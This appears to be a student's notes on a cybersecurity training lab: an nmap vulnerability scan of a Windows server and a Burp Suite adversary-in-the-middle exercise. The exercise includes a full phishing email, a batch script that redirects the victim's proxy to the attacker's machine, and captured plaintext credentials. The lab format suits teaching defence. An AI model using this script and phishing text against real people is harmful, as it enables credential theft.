adam's notes

Lab - Using Nontraditional Vulnerability Scanning Tools

Scenario

In this lab, you will run vulnerability scans using nmap, detect exploitable issues with Burp Suite, and review the results of the nmap scan.

The focus of this lab is the tools not traditionally considered vulnerability scanners, but which can absolutely detect and identify vulnerabilities.

As a cybersecurity analyst, you are working to discover weaknesses and vulnerabilities that your organization, Structureality Inc., needs to mitigate throughout its internal network. This lab focuses on finding weaknesses in a target server with nmap and discovering insecure protocols using Burp Suite.

Your cybersecurity analyst (CySA) workstation, running Kali Linux, is located in Structureality’s server subnet.

Understand your environment

You will be working from a virtual machine named KALI hosting Kali Linux connected to the vLAN_SERVERS subnet. You will be performing vulnerability scans against a Windows 2016 Server named MS10. You also be working against a website at juiceshop.local hosted within the company’s screened subnet.

Perform a vulnerability scan using nmap

There are over 600 NSE (nmap scripting engine) scripts available to use with nmap. Most of these are grouped into categories to facilitate the execution of them against targets. One of these categories is vuln (i.e., vulnerabilities) which has over 100 scripts which will attempt to discover vulnerabilities in a target. In this exercise you will run these scripts against a Windows Server 2016 system.

  1. use: nmap 10.1.16.2 --script=vuln -vv -sC -sV -O -oN ms10-vuln-scan.txt

This nmap command will perform several operations against the 10.1.16.2 (MS10) target. This includes a default SYN scan against the top 1000 TCP ports in addition to the following explicit functions:

  • The “—script=vuln” parameter runs the set of NSE (nmap scripting engine) scripts in the vuln (i.e., vulnerabilities) category.
  • The “-vv” parameter sets the output to maximum verbosity.
  • The “-sC” parameter runs the default script scan, which is the set of NSE scripts in the default category.
  • The “-sV” parameter performs a version scan, which attempts to elicit the identity of services on open ports.
  • The “-O” parameter attempts to identify the operating system.
  • The “-oN” parameter saves the output of nmap to the specified filename (in addition to the screen display of the same).

Intercept web credentials

In this exercise, you will perform an adversary in the middle (AitM) attack so you can intercept web communications. The goal is to determine if web credentials can be stolen via a social engineering attack. This will reveal whether insecure protocols are in use in the network as well as if users are vulnerable to forms of social engineering.

  1. Burp Suite needs to be configured to perform Proxy without intercept. Start by selecting the Kali Applications menu from the top taskbar. It is to the far left and looks like a stylized white dragon on a blue square.

  2. Another Burp Suite Community Edition pop-up window is displayed welcoming you to the Burp Suite Community Edition. Select Temporary project, then select Next.

  3. On the Select the configuration that you would like to load for this project page, select Use Burp defaults, then select Start Burp.

  4. Select the Proxy tab in the Burp Suite window.

  5. On the Proxy tab, select the Options sub-tab.

  6. In the top section, under the heading Proxy Listeners, select Add.

  7. On the Add a new proxy listener window, enter 8080 in the Bind to port: field.

  8. Select Specific address, then select 10.1.16.66 in the pull-down list, then select OK.

  9. Select the Intercept sub-tab of the Proxy tab.

  10. Confirm that the middle button near the top of the sub-tab is showing Intercept is off

  11. Select the HTTP history sub-tab of the Proxy tab.

Next, you need to prepare an attack script and social engineering attack to trick the victim into using your Kali system as their proxy.

  1. Open a new Terminal window by selecting the Terminal Emulator from the Kali Linux toolbar.

  2. Enter vim /var/www/html/newproxy.bat

    • This command will open VIM and create a new file named newproxy.bat. This new file is saved in the /var/www/html directory, which is the web root for the local Apache web server.

  3. Type i to enter insert mode. The message -- INSERT -- should be present at the bottom of the screen.

  4. Type the following into the empty document area of VIM:

    • Be sure to create a final blank new line.
@echo off
PowerShell Set-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\'Internet Settings' -Name ProxyServer -Value 10.1.16.66:8080
PowerShell Set-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\'Internet Settings' -Name ProxyEnable -Value 1

  1. Once finished, press ESC to exit insert mode.

  2. Enter :wq to save and quit VIM.

  3. Enter service apache2 start

    • This command starts the preexisting Apache2 installation within Kali.

  4. Minimize the Terminal window.

At this point, you are ready to exploit the victim. The scenario is that you, as the attacker, send the jaime@structureality.com account the following email message:

Dear 515Support customer,

Due to recent equipment changes, there is a need to alter the configuration of your system's proxy settings. Please follow the link below to access an auto-configuration script that will download and apply the necessary changes to your system.

http://10.1.16.66/newproxy.bat

Once you have downloaded this file, execute it. Your system may warn you that this is an unknown program. Don't worry about that. Just agree to allow it to run it anyway. Our in-house security team wrote this tool, and it is safe to run.

Once the change is made, you are invited to visit the local Juice Shop, where you will receive a free juice on us. We have already set up the discount code by creating an account with your username and password. So, visit juiceshop.local, then log in to obtain your free juice!

Sincerely, 515Support

Info

This exercise assumes the social engineering phishing message has been sent to the victim.

You will temporarily play the part of the victim.

  1. Select the MS10 VM

  2. Minimize or close Server Manager if it appears. It will not be used in this lab.

  3. Open Firefox.

  4. In the Firefox address bar, enter http://10.1.16.66/newproxy.bat

  5. The download should happen quickly. The Firefox Downloads window should be displayed. Select newproxy.bat from the Downloads window.

  6. A pop-up window appears asking whether to open the file, select OK.

  7. Security Warning pop-up window appears, select Run.

Info

At this point, the victim’s proxy settings are now changed to use the attacker’s computer (i.e., Kali) as its proxy server.

  1. Close Firefox.

  2. Now you want to claim your free juice! Start Firefox again and then in the address bar, enter juiceshop.local

  3. If a Welcome to OWASP Juice Shop pop-up appears, select Dismiss.

  4. Select Account in the top-right area of the web page, then select Login.

  5. Since the email claimed you have an established account using your local credentials, type jaime@structureality.com in the Email field and type Pa$$w0rd in the Password field, then select Log in.

  6. This login attempt will fail. You will see the message Invalid email or password.

  7. Switch back to the KALI virtual machine and, if needed, sign in as root using Pa$$w0rd as the password.

  8. The Burp Suite interface should still be open to the HTTP history sub-tab.

You need to find the last communication from the victim to the Juice Shop host of http://juiceshop.local. The communication you are looking for should have the following parameters:

Method: POST URL: /rest/user/login Params: (checkmark) Status: 401 MIME Type: text

There will be other captured communications besides the victim’s visit to the Juice Shop website. So, it may take some effort to locate the specific communication.

  1. Select the MIME type column to sort by that value. If the column looks empty, then select it again. You want the sorting to be inverted, so those MIME type “text” communications are at the top.

  2. This should have a result with very few communications of MIME type text sorted to the top.

  3. Look at each until you see the one which matches the needed parameters, then select it.

  4. The contents of the selected message will be shown in the bottom left pane of Burp Suite.

  5. You should see the following at the bottom of the communication:

"email":"jaime@structureality.com",
"password":"Pa$$w0rd"

You have now phished (i.e., stolen) the victim’s credentials using a social engineering attack. The attack procedure was first to change the victim’s system settings to use the attacker’s system as a proxy. Then by tricking them into visiting a website and attempting to authenticate, you have obtained their credentials.

This exercise has demonstrated the vulnerability that insecure protocols can be intercepted in transit by listening devices. This exercise uses an AitM approach, but a sniffing approach may be just as effective. This issue should be reported and recommend that all protocols be upgraded to their encrypted forms.

  1. Close Burp Suite, select Yes to confirm closing.

Review the nmap scan results

Now that the nmap vuln scan has completed, you need to review the results. The goal of reviewing any vulnerability report is determine the issues that need to be mitigated by the security team.

  1. Connect to the KALI VM

  2. Return to the Terminal window where nmap was executed in the first exercise.

  3. The target’s nmap vulnerability scan should have been completed.

  4. While you could scroll back up to view the results, you can view the results from the output file. Enter less ms10-vuln-scan.txt to open the nmap scan output file in the less viewing utility.

  5. Read over the results.

    • identify the OS

  6. After you have reviewed the nmap output file and answered the previous questions, type q to exit the less viewer.

When reviewing the output of any security tool or vulnerability scanner, it is important to keep several issues in mind. First, you need to validate or verify vulnerabilities before initiating mitigations. False positive items do not need to be resolved, only true positive issues. Second, you need to prioritize the verified issues. This provides guidance to the security team as to the order and urgency to address the reported problems. Finally, you should make recommendations on responses or remedies when known. As a cybersecurity analyst, you may often know how to resolve specific problems you discover. Passing this information along to the security team can make their response to vulnerabilities more efficient.

Graph View